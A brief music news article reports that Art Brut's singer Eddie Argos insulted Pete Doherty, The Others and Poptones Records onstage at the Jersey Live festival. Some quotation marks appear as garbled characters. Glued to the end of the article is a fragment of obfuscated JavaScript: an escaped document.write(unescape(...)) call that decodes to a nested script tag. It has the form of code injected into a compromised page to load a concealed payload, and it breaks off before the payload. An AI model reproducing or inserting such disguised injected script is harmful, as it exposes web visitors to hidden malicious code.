Fresh from their spat with Bloc Party, Art Brut have risked a new beef with Pete Doherty.
The south London band attacked the former Libertine from the stage during their set at the Jersey Live festival at the weekend.
Concluding the song 'My Little Brother', singer Eddie Argos told the crowd: “Steer clear of crack, and steer clear of Pete Doherty, he's a very bad man.â€
Argos then took at swipe at The Others and their record label, declaring: “Oh, and steer clear of The Others too and Poptones Records.â€
The attack on Doherty and The Others came during an entertaining set from Art Brut, which saw the band affectionately pelted with odd socks by their hardcore Channel Island fanbase, while they also played a new song about skiving called 'Blame It On The Trains'.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
